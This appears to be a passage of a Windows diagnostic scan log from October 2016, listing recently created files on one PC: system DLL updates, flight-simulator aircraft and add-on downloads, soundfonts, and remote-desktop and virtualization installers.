2016-10-13 15:27 - 2016-10-05 02:09 - 00674304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll
2016-10-13 15:27 - 2016-10-05 02:08 - 02356736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVidCtl.dll
2016-10-13 15:27 - 2016-10-05 02:08 - 00598528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll
2016-10-13 15:27 - 2016-10-05 02:07 - 00589312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Sensors.dll
2016-10-13 15:27 - 2016-10-05 02:07 - 00542208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.Connectivity.dll
2016-10-13 15:27 - 2016-10-05 02:06 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll
2016-10-13 15:27 - 2016-10-04 17:01 - 00446124 _____ C:\WINDOWS\system32\ApnDatabase.xml
2016-10-13 15:08 - 2016-10-13 15:27 - 74538332 _____ C:\Users\Kyle Aniel\Downloads\ready_for_pushback_boeing_747-200v2_fs2004.zip
2016-10-11 21:35 - 2016-10-11 22:09 - 101448493 _____ C:\Users\Kyle Aniel\Downloads\MD-8x.rar
2016-10-11 21:17 - 2016-10-11 21:17 - 23402545 _____ (Markus Schwenk) C:\Users\Kyle Aniel\Downloads\MidiEditor-3.0.0-Setup.exe
2016-10-11 14:24 - 2016-10-11 14:24 - 00000000 ____D C:\Users\Kyle Aniel\Documents\test
2016-10-11 14:08 - 2016-10-11 14:42 - 63307776 _____ C:\Users\Kyle Aniel\Downloads\Fsx - md 80.rar
2016-10-11 14:08 - 2016-10-11 14:08 - 00019924 _____ C:\Users\Kyle Aniel\Downloads\f-s-x-flight-1-super-md-80.torrent
2016-10-10 21:33 - 2016-10-10 21:33 - 00155346 _____ C:\Users\Kyle Aniel\Downloads\1476160139_J0OdkDfEzHBASpqKICO9_tr.mid
2016-10-10 21:33 - 2016-10-10 21:33 - 00155346 _____ C:\Users\Kyle Aniel\Downloads\1476160139_J0OdkDfEzHBASpqKICO9_tr (1).mid
2016-10-10 21:21 - 2016-10-10 21:22 - 116153496 _____ C:\Users\Kyle Aniel\Downloads\Orchestra Soundfont 2 COMBO.sf2
2016-10-10 21:14 - 2016-10-10 21:15 - 148358590 _____ C:\Users\Kyle Aniel\Downloads\FluidR3_GM.sf2
2016-10-10 21:10 - 2016-10-10 21:14 - 75148691 _____ C:\Users\Kyle Aniel\Downloads\FluidR3_GM.sfArk
2016-10-10 21:08 - 2016-10-10 21:08 - 12189088 _____ C:\Users\Kyle Aniel\Downloads\Chaos_V20.sf2
2016-10-10 21:06 - 2016-10-18 19:38 - 00001977 _____ C:\Users\banie_000\Desktop\SynthFont.lnk
2016-10-10 21:06 - 2016-10-10 21:07 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\SynthFont
2016-10-10 21:06 - 2016-10-10 21:06 - 07479100 _____ (Kenneth Rundt) C:\Users\Kyle Aniel\Downloads\SynthFontSetup.exe
2016-10-10 21:06 - 2016-10-10 21:06 - 00000000 ____D C:\Users\banie_000\Documents\SynthFont
2016-10-10 21:06 - 2016-10-10 21:06 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SynthFont
2016-10-10 21:06 - 2016-10-10 21:06 - 00000000 ____D C:\Program Files (x86)\SynthFont
2016-10-10 21:04 - 2016-10-10 21:05 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\SFPACK
2016-10-10 21:04 - 2016-10-10 21:04 - 00000752 _____ C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SFPack.lnk
2016-10-10 21:03 - 2016-10-10 21:03 - 06823140 _____ C:\Users\Kyle Aniel\Downloads\Chaos_V20.sfArk
2016-10-10 21:03 - 2016-10-10 21:03 - 00110774 _____ C:\Users\Kyle Aniel\Downloads\SFPACK.zip
2016-10-10 20:51 - 2016-10-11 21:23 - 00178744 _____ C:\Users\Kyle Aniel\Downloads\25287_Rhapsody-in-Blue.mid
2016-10-09 22:54 - 2016-10-09 22:54 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\sas_md81
2016-10-09 22:27 - 2016-10-09 22:51 - 73172380 _____ C:\Users\Kyle Aniel\Downloads\sas_md81.zip
2016-10-09 22:11 - 2016-10-09 22:11 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Blender
2016-10-09 22:10 - 2016-10-09 22:10 - 00000000 ____D C:\Program Files\Blender Foundation
2016-10-09 22:08 - 2016-10-09 22:59 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\md80-88_pack_v2
2016-10-09 22:08 - 2016-10-09 22:09 - 89464832 _____ C:\Users\Kyle Aniel\Downloads\blender-2.78-windows64.msi
2016-10-09 22:05 - 2016-10-09 22:07 - 86701411 _____ C:\Users\Kyle Aniel\Downloads\md80-88_pack_v2.zip
2016-10-09 17:02 - 2016-10-09 17:02 - 00015413 _____ C:\Users\Kyle Aniel\Downloads\c-l-s-m-d82-jet-liner.torrent
2016-10-09 16:32 - 2016-10-09 16:34 - 146373100 _____ C:\Users\Kyle Aniel\Downloads\CLS MD 81.rar
2016-10-09 16:31 - 2016-10-09 16:31 - 03833515 _____ C:\Users\Kyle Aniel\Downloads\FSUIPC4.40.rar
2016-10-09 16:30 - 2016-10-09 16:30 - 00001827 _____ C:\Users\Kyle Aniel\Downloads\f-s9-f-s-x-f-s-u-i-p-c-440.torrent
2016-10-08 23:05 - 2016-10-08 23:05 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\44936-B737-800
2016-10-08 23:04 - 2016-10-08 23:05 - 02745258 _____ C:\Users\Kyle Aniel\Downloads\44936-B737-800.zip
2016-10-08 22:57 - 2016-10-08 22:57 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSND_FSX-B737Upgraded_Cockpit
2016-10-08 22:56 - 2016-10-08 22:56 - 25298732 _____ C:\Users\Kyle Aniel\Downloads\FSND_FSX-B737Upgraded_Cockpit.zip
2016-10-08 18:54 - 2016-10-08 18:54 - 00478301 _____ C:\Users\Kyle Aniel\Desktop\concorde144af_parts.pdf
2016-10-08 18:54 - 2016-10-08 18:54 - 00236704 _____ C:\Users\Kyle Aniel\Desktop\concorde144_instr.pdf
2016-10-08 18:36 - 2016-10-08 18:36 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\CLSMD80&87
2016-10-08 18:30 - 2016-10-08 18:30 - 00017879 _____ C:\Users\Kyle Aniel\Downloads\[torrenty.to] [FSX]CLS MD81-82 and MD87 with serial.torrent
2016-10-08 17:50 - 2016-10-17 19:16 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\JustFlight
2016-10-08 17:37 - 2016-10-08 17:47 - 1172939413 _____ C:\Users\Kyle Aniel\Downloads\JF Tristar by iTrekx.rar
2016-10-08 17:28 - 2016-10-08 17:28 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\toml1011
2016-10-08 17:27 - 2016-10-08 17:27 - 10282684 _____ C:\Users\Kyle Aniel\Downloads\toml1011.zip
2016-10-08 17:06 - 2016-10-08 17:06 - 00599420 _____ C:\Users\Kyle Aniel\Downloads\[Free-scores.com]_gershwin-george-rhapsody-in-blue-31021.pdf
2016-10-08 16:20 - 2016-10-16 06:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\aerosoft
2016-10-08 16:00 - 2015-04-17 13:46 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Aerosoft
2016-10-08 14:40 - 2016-10-08 14:40 - 01360299 _____ C:\Users\Kyle Aniel\Downloads\sky-textures-for-enb-series_12.zip
2016-10-08 14:14 - 2016-10-08 14:14 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\738BLACKPANELFIX
2016-10-08 14:12 - 2016-10-08 14:13 - 02986348 _____ C:\Users\Kyle Aniel\Downloads\738BLACKPANELFIX.zip
2016-10-08 13:53 - 2016-10-08 13:53 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\B737_800
2016-10-08 13:51 - 2016-10-08 13:51 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\CanjetBoeing738FSX
2016-10-08 13:11 - 2016-10-08 13:50 - 118588938 _____ C:\Users\Kyle Aniel\Downloads\CanjetBoeing738FSX.zip
2016-10-08 12:22 - 2016-10-08 15:04 - 00000000 ____D C:\ProgramData\firebird
2016-10-08 12:21 - 2016-10-18 19:38 - 00000650 _____ C:\Users\banie_000\Desktop\PRO-ATC-X.lnk
2016-10-08 12:21 - 2016-10-08 12:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PRO-ATC-X
2016-10-08 12:18 - 2016-10-08 12:41 - 00000000 ____D C:\PRO-ATC-X
2016-10-08 12:08 - 2016-10-08 12:08 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\Pointsoft-Pro-ATC-X.v1.2.3.8
2016-10-08 11:46 - 2016-10-08 11:51 - 236842241 _____ C:\Users\Kyle Aniel\Downloads\Pointsoft-Pro-ATC-X.v1.2.3.8.zip
2016-10-08 11:45 - 2016-10-08 11:45 - 00018526 _____ C:\Users\Kyle Aniel\Downloads\[www.seedpeer.eu] Fsx P3d Pointsoft Pro Atc X V1 2 3 8.SEEDPEER.torrent
2016-10-08 09:29 - 2016-10-08 09:30 - 68343766 _____ C:\Users\Kyle Aniel\Downloads\FSX How to autoland (ILS land) EASY - Tutorial.mp4
2016-10-08 09:28 - 2016-10-08 09:28 - 00002847 _____ C:\Users\Kyle Aniel\Downloads\mfp.htm
2016-10-08 07:21 - 2016-10-08 07:22 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\aa738908nn-x-fsrepaintsger
2016-10-08 07:16 - 2016-10-08 07:20 - 09618253 _____ C:\Users\Kyle Aniel\Downloads\aa738908nn-x-fsrepaintsger.zip
2016-10-07 23:27 - 2016-10-07 23:27 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\b738american_fsx
2016-10-07 23:17 - 2016-10-07 23:26 - 27010695 _____ C:\Users\Kyle Aniel\Downloads\b738american_fsx.zip
2016-10-07 23:07 - 2016-10-07 23:07 - 16120277 _____ C:\Users\Kyle Aniel\Downloads\tds_boeing_737-800_american_n969nn (1).zip
2016-10-07 23:01 - 2016-10-07 23:01 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\posky_boeing_737-800_okay_airways_fsx
2016-10-07 22:59 - 2016-10-07 22:59 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSX Cracks para todas las verciones
2016-10-07 22:58 - 2016-10-07 22:58 - 06235914 _____ C:\Users\Kyle Aniel\Downloads\FSX Cracks para todas las verciones.rar
2016-10-07 22:57 - 2016-10-07 23:00 - 16161514 _____ C:\Users\Kyle Aniel\Downloads\posky_boeing_737-800_okay_airways_fsx.zip
2016-10-07 22:38 - 2016-10-07 22:39 - 13630490 _____ C:\Users\Kyle Aniel\Downloads\tds738_aal_318440 (1).zip
2016-10-07 22:36 - 2016-10-07 22:36 - 14138519 _____ C:\Users\Kyle Aniel\Downloads\american_n932an (1).zip
2016-10-07 22:35 - 2016-10-07 22:35 - 16120354 _____ C:\Users\Kyle Aniel\Downloads\tds_boeing_737-800_american_n969nn.zip
2016-10-07 22:34 - 2016-10-07 22:35 - 09891996 _____ C:\Users\Kyle Aniel\Downloads\tds738_american_airlines.zip
2016-10-07 22:34 - 2016-10-07 22:34 - 11109908 _____ C:\Users\Kyle Aniel\Downloads\tds737-800aal-twa.zip
2016-10-07 22:34 - 2016-10-07 22:34 - 09932969 _____ C:\Users\Kyle Aniel\Downloads\tds737-800aal-renoair.zip
2016-10-07 22:33 - 2016-10-07 22:33 - 14138519 _____ C:\Users\Kyle Aniel\Downloads\american_n932an.zip
2016-10-07 22:33 - 2016-10-07 22:33 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\american_n932an
2016-10-07 22:32 - 2016-10-07 22:33 - 13630490 _____ C:\Users\Kyle Aniel\Downloads\tds738_aal_318440.zip
2016-10-07 22:27 - 2016-10-07 22:27 - 13969822 _____ C:\Users\Kyle Aniel\Downloads\TDS-737-800WL-American-Airlines-N909NN.zip
2016-10-07 22:26 - 2016-10-07 22:26 - 20893343 _____ C:\Users\Kyle Aniel\Downloads\TDS-737-800WL-American-Airlines-N925NN.zip
2016-10-07 21:48 - 2016-10-07 21:55 - 939436352 _____ (Acresso Software Inc. ) C:\Users\Kyle Aniel\Downloads\AS_AIRBUS-X-EXTENDED_FSX-P3D_V115 (1).exe
2016-10-07 21:25 - 2016-10-07 21:31 - 939436352 _____ (Acresso Software Inc. ) C:\Users\Kyle Aniel\Downloads\AS_AIRBUS-X-EXTENDED_FSX-P3D_V115.exe
2016-10-07 21:17 - 2016-10-07 21:18 - 305520897 _____ C:\Users\Kyle Aniel\AppData\Local\ACCCx3_8_0_310.zip.aamdownload
2016-10-07 21:17 - 2016-10-07 21:18 - 00003413 _____ C:\Users\Kyle Aniel\AppData\Local\ACCCx3_8_0_310.zip.aamdownload.aamd
2016-10-07 20:58 - 2016-10-18 19:38 - 00001225 _____ C:\Users\banie_000\Desktop\Continue AndyOS Installation.lnk
2016-10-06 20:32 - 2016-10-06 20:32 - 99223394 _____ C:\Users\Kyle Aniel\Desktop\Math textbook answers.zip
2016-10-06 18:03 - 2016-10-06 18:03 - 02727678 _____ C:\Users\Kyle Aniel\Downloads\44582-B737-800.zip
2016-10-06 18:03 - 2016-10-06 18:03 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\44582-B737-800
2016-10-06 17:59 - 2016-10-06 17:59 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\default_737_vc_gray_upgrade_texture
2016-10-06 17:58 - 2016-10-06 17:58 - 14710813 _____ C:\Users\Kyle Aniel\Downloads\default_737_vc_gray_upgrade_texture.zip
2016-10-05 21:47 - 2016-10-05 22:01 - 1642885475 _____ C:\Users\Kyle Aniel\Desktop\AS_AIRBUS-A320-A321_FSX-P3D-FSXSTEAM_V130a.rar
2016-10-05 21:44 - 2016-10-05 21:44 - 05128495 _____ C:\Users\Kyle Aniel\Downloads\Windows 8 to OS X Yosemite (5th Edition).pdf
2016-10-05 19:33 - 2016-10-05 19:33 - 00000000 _____ C:\Users\Kyle Aniel\Desktop\New Text Document (2).txt
2016-10-05 18:12 - 2016-10-18 19:40 - 00001919 _____ C:\Users\Public\Desktop\BlueStacks.lnk
2016-10-05 18:12 - 2016-10-18 19:39 - 00001931 _____ C:\ProgramData\Microsoft\Windows\Start Menu\BlueStacks.lnk
2016-10-05 17:57 - 2016-10-05 18:12 - 00000000 ____D C:\Program Files (x86)\Bluestacks
2016-10-05 17:57 - 2016-09-29 07:00 - 00000000 ____D C:\ProgramData\Bluestacks
2016-10-05 17:55 - 2016-10-05 17:57 - 322368136 _____ (BlueStack Systems Inc.) C:\Users\Kyle Aniel\Downloads\BlueStacks2_native_5740d773271a7331d8c1a4ebc64792e5.exe
2016-10-05 05:51 - 2016-10-05 05:53 - 00000104 _____ C:\Users\Kyle Aniel\Desktop\New Text Document.txt
2016-10-05 05:34 - 2016-10-06 15:55 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\New folder
2016-10-04 19:59 - 2016-10-04 19:59 - 00597304 _____ C:\Users\Kyle Aniel\Downloads\flux-setup.exe
2016-10-04 19:59 - 2016-10-04 19:59 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Flux
2016-10-04 19:59 - 2016-10-04 19:59 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\FluxSoftware
2016-10-04 19:43 - 2016-10-04 19:43 - 00000000 ___HD C:\$Windows.~WS
2016-10-04 19:42 - 2016-10-04 19:44 - 00000000 ____D C:\ESD
2016-10-04 19:41 - 2016-10-04 19:41 - 18309328 _____ (Microsoft Corporation) C:\Users\Kyle Aniel\Downloads\MediaCreationTool (1).exe
2016-10-04 19:35 - 2016-10-18 19:40 - 00001150 _____ C:\Users\Public\Desktop\Oracle VM VirtualBox.lnk
2016-10-04 19:35 - 2016-10-04 19:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Oracle VM VirtualBox
2016-10-04 19:35 - 2016-10-04 19:35 - 00000000 ____D C:\Program Files\Oracle
2016-10-04 19:35 - 2016-09-12 18:18 - 00920168 _____ (Oracle Corporation) C:\WINDOWS\system32\Drivers\VBoxDrv.sys
2016-10-04 19:35 - 2016-09-12 18:17 - 00149256 _____ (Oracle Corporation) C:\WINDOWS\system32\Drivers\VBoxUSBMon.sys
2016-10-04 19:34 - 2016-10-04 19:35 - 122288608 _____ (Oracle Corporation) C:\Users\Kyle Aniel\Downloads\VirtualBox-5.1.6-110634-Win.exe
2016-10-04 19:15 - 2016-10-04 19:15 - 01409778 _____ C:\Users\Kyle Aniel\Downloads\CA_U2M04L01_TE.pdf
2016-10-04 14:07 - 2016-10-04 14:07 - 18309328 _____ (Microsoft Corporation) C:\Users\Kyle Aniel\Downloads\MediaCreationTool.exe
2016-10-04 14:07 - 2016-10-04 14:07 - 00000000 ____D C:\$WINDOWS.~BT
2016-10-04 13:44 - 2016-10-04 13:44 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Splashtop
2016-10-04 13:42 - 2016-10-04 13:42 - 00000000 ____D C:\ProgramData\Splashtop
2016-10-04 13:42 - 2016-10-04 13:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Splashtop Remote
2016-10-04 13:42 - 2016-10-04 13:42 - 00000000 ____D C:\Program Files (x86)\Splashtop
2016-10-04 13:41 - 2016-10-04 13:41 - 25636832 _____ (Splashtop Inc.) C:\Users\Kyle Aniel\Downloads\Splashtop_Streamer_Windows_v3.1.0.0.exe
2016-10-03 19:55 - 2016-10-03 19:55 - 00000000 ____D C:\ProgramData\Google
2016-10-03 19:50 - 2016-10-03 19:50 - 12427264 _____ C:\Users\Kyle Aniel\Downloads\chromeremotedesktophost.msi
2016-10-03 19:46 - 2016-10-03 19:47 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Deployment
2016-10-03 19:46 - 2016-10-03 19:46 - 00016108 _____ C:\Users\Kyle Aniel\Downloads\rdassistant.application
2016-10-03 19:46 - 2016-10-03 19:46 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Remote Desktop assistant
2016-10-03 19:40 - 2016-10-03 19:40 - 00000000 ____H C:\Users\Kyle Aniel\Documents\Default.rdp
2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\SxS
2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\Shapes
2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\resx
2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\Resources
2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\FileTypes
2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\Effects
2016-10-02 18:47 - 2016-10-02 18:47 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\737800AA
2016-10-02 18:40 - 2016-10-02 18:43 - 08687986 _____ C:\Users\Kyle Aniel\Downloads\737800AA.zip
2016-10-02 18:26 - 2016-10-02 18:26 - 01515520 _____ C:\Users\Kyle Aniel\Downloads\VAInterface_2.20.3.11642 (2).msi
2016-10-02 18:26 - 2016-10-02 18:26 - 01515520 _____ C:\Users\Kyle Aniel\Downloads\VAInterface_2.20.3.11642 (1).msi
2016-10-02 17:51 - 2016-10-02 17:52 - 64991096 _____ ( Flight1, Inc.) C:\Users\Kyle Aniel\Downloads\Super-80-FSX (1).exe
2016-10-02 17:48 - 2016-10-02 17:49 - 64991096 _____ ( Flight1, Inc.) C:\Users\Kyle Aniel\Downloads\Super-80-FSX.exe
2016-10-02 17:45 - 2016-10-02 17:46 - 2969567232 _____ C:\Users\Kyle Aniel\Downloads\FSX_Acceleration.iso
2016-10-02 17:41 - 2016-10-02 17:41 - 01520816 _____ C:\Users\Kyle Aniel\Downloads\DeluxeCrack.rar
2016-10-02 17:41 - 2016-10-02 17:41 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\DeluxeCrack
2016-10-02 17:38 - 2016-10-02 17:38 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\Crackacceleration
2016-10-02 17:36 - 2016-10-02 17:36 - 01582010 _____ C:\Users\Kyle Aniel\Downloads\Crackacceleration.rar
2016-10-02 09:00 - 2016-10-02 13:31 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\CS_B777-200ER_GE
2016-10-02 08:48 - 2016-10-02 08:52 - 142847356 _____ C:\Users\Kyle Aniel\Desktop\Captain Sim 777 demo.mp4
2016-10-02 08:33 - 2016-10-02 08:33 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\rrtrent800snd
2016-10-02 08:15 - 2016-10-02 08:16 - 54397943 _____ C:\Users\Kyle Aniel\Downloads\rrtrent800snd.zip
2016-10-02 08:10 - 2016-08-03 13:03 - 1115007685 ____N C:\Users\Kyle Aniel\Desktop\Th3.M2rt12n.15.007.M0viesC0unter.mp4
2016-10-02 07:29 - 2016-10-02 07:30 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\move
2016-10-01 21:29 - 2016-10-01 21:34 - 159565637 _____ C:\Users\Kyle Aniel\Desktop\EGLL Landing.mp4
2016-10-01 21:12 - 2016-10-01 21:12 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\KYLE-PC 10-1-2016 9.11.14 PM
2016-10-01 21:03 - 2016-10-01 21:03 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Expression
2016-10-01 18:52 - 2016-10-01 18:52 - 00000210 _____ C:\A320_.ini
2016-10-01 16:39 - 2016-10-01 16:44 - 1639972864 _____ C:\Users\Kyle Aniel\Downloads\AS_AIRBUS-A320-A321_FSX-P3D-FSXSTEAM_V130a.rar
2016-10-01 15:36 - 2016-10-01 15:36 - 00000210 _____ C:\B752_.ini
2016-10-01 15:21 - 2016-10-01 15:21 - 00051530 _____ C:\Users\banie_000\Documents\1.ecs
2016-10-01 15:15 - 2016-10-01 15:15 - 01515520 _____ C:\Users\Kyle Aniel\Downloads\VAInterface_2.20.3.11642.msi
2016-10-01 15:02 - 2016-10-01 15:02 - 00202240 _____ C:\Users\Kyle Aniel\Downloads\AirMouse.exe
2016-10-01 14:57 - 2016-10-01 14:57 - 22003144 _____ (Magic CPR, LLC) C:\Users\Kyle Aniel\Downloads\PointerMouseServer.exe
2016-10-01 14:56 - 2016-10-01 14:56 - 01427704 _____ (Magic CPR, LLC) C:\Users\Kyle Aniel\Downloads\MagicCPR.exe
2016-10-01 13:02 - 2016-10-01 13:02 - 00000136 _____ C:\Aircraft_cameras.INI
2016-10-01 12:42 - 2016-10-01 13:02 - 00000295 _____ C:\VC_cameras.INI
2016-10-01 12:35 - 2016-10-18 19:40 - 00001075 _____ C:\Users\Public\Desktop\English Manual.pdf.lnk
2016-10-01 12:33 - 2016-10-01 12:34 - 17538578 _____ C:\Users\Kyle Aniel\Downloads\EZDok Camera v1.18.7.rar
2016-10-01 11:20 - 2016-10-01 11:20 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\ADE_170_Production
2016-10-01 11:18 - 2016-10-01 11:19 - 17085562 _____ C:\Users\Kyle Aniel\Downloads\ADE_170_Production.zip
2016-10-01 07:53 - 2016-10-01 07:53 - 181852854 _____ C:\Users\Kyle Aniel\Downloads\FSDT-KLAXv2.7z
2016-10-01 05:55 - 2016-10-19 14:41 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Youcam
2016-09-30 06:02 - 2016-09-30 06:02 - 00204479 _____ C:\Users\Kyle Aniel\Desktop\Taxes.pdf
2016-09-29 19:00 - 2016-09-29 19:00 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Custom Office Templates
2016-09-29 18:17 - 2016-09-29 18:17 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\csb777_200_aanc
2016-09-29 18:13 - 2016-09-29 18:16 - 09176585 _____ C:\Users\Kyle Aniel\Downloads\csb777_200_aanc.zip
2016-09-29 18:05 - 2016-09-29 17:59 - 566525952 _____ C:\Users\Kyle Aniel\Desktop\00006.MTS
2016-09-29 18:04 - 2016-09-29 17:55 - 378273792 _____ C:\Users\Kyle Aniel\Desktop\00005.MTS
2016-09-29 18:04 - 2016-09-29 17:39 - 838041600 _____ C:\Users\Kyle Aniel\Desktop\00004.MTS
2016-09-29 18:03 - 2016-09-29 17:31 - 538509312 _____ C:\Users\Kyle Aniel\Desktop\00003.MTS
2016-09-29 18:03 - 2016-09-29 17:27 - 589037568 _____ C:\Users\Kyle Aniel\Desktop\00002.MTS
2016-09-29 18:03 - 2016-09-29 17:22 - 605945856 _____ C:\Users\Kyle Aniel\Desktop\00001.MTS
2016-09-29 18:02 - 2016-09-29 17:16 - 562790400 _____ C:\Users\Kyle Aniel\Desktop\00000.MTS
2016-09-29 15:15 - 2016-09-15 10:22 - 00860512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2016-09-29 15:15 - 2016-09-15 10:21 - 01000288 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-09-29 15:15 - 2016-09-15 09:56 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManagerApi.dll
2016-09-29 15:15 - 2016-09-15 09:40 - 05061120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2016-09-29 15:15 - 2016-09-15 09:40 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll
2016-09-29 15:15 - 2016-09-15 09:37 - 00266240 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConsoleLogon.dll
2016-09-29 15:15 - 2016-09-15 09:36 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2016-09-29 15:15 - 2016-09-15 09:32 - 01037312 _____ (Microsoft Corporation) C:\WINDOWS\system32\nettrace.dll
2016-09-29 15:15 - 2016-09-15 09:23 - 03405824 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2016-09-29 15:15 - 2016-09-15 09:21 - 02538496 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2016-09-29 15:15 - 2016-09-15 09:20 - 00845824 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApiPublic.dll
2016-09-29 15:15 - 2016-08-05 01:29 - 00568832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.UXRes.dll
2016-09-29 15:14 - 2016-09-15 11:14 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2016-09-29 15:14 - 2016-09-15 10:40 - 00965472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ReAgent.dll
2016-09-29 15:14 - 2016-09-15 10:35 - 00455040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DolbyDecMFT.dll
2016-09-29 15:14 - 2016-09-15 10:33 - 00083120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\devenum.dll
2016-09-29 15:14 - 2016-09-15 10:30 - 00354264 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2016-09-29 15:14 - 2016-09-15 10:29 - 01377016 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe
2016-09-29 15:14 - 2016-09-15 10:29 - 01117024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll
2016-09-29 15:14 - 2016-09-15 10:29 - 00603488 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll
2016-09-29 15:14 - 2016-09-15 10:29 - 00512416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll
2016-09-29 15:14 - 2016-09-15 10:27 - 05622088 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2016-09-29 15:14 - 2016-09-15 10:27 - 00553312 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-09-29 15:14 - 2016-09-15 10:27 - 00434528 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2016-09-29 15:14 - 2016-09-15 10:25 - 02681200 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-09-29 15:14 - 2016-09-15 10:23 - 00170960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2016-09-29 15:14 - 2016-09-15 10:21 - 01218912 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-09-29 15:14 - 2016-09-15 10:20 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-09-29 15:14 - 2016-09-15 10:20 - 00634944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2016-09-29 15:14 - 2016-09-15 10:18 - 00404832 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-09-29 15:14 - 2016-09-15 10:16 - 01292640 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2016-09-29 15:14 - 2016-09-15 10:16 - 00527808 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWanAPI.dll
2016-09-29 15:14 - 2016-09-15 10:15 - 00218976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys
2016-09-29 15:14 - 2016-09-15 10:14 - 01267512 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
